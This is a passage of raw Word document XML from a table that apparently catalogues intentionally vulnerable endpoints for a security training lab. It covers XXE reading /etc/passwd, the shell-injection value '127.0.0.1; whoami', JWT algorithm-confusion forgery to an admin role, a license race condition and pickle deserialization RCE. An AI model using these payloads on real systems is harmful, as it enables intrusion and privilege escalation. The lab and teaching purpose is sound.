            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/reports/upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SYSTEM "file:///etc/passwd" in DOCTYPE entity declaration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="0B1929"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/diagnostics/run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">127.0.0.1; whoami — unsanitised host param passed to shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="0B1929"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT Algorithm Confusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/admin/users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Change alg RS256→HS256, sign with public key, set role=ciso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="0B1929"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Race Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/licenses/redeem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">10 parallel POST requests → over-consume 1-seat license</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="0B1929"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Insecure Deserialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/session/import</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4F8FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Craft malicious pickle payload → base64 encode → RCE on server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:left w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="C8D6E5" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
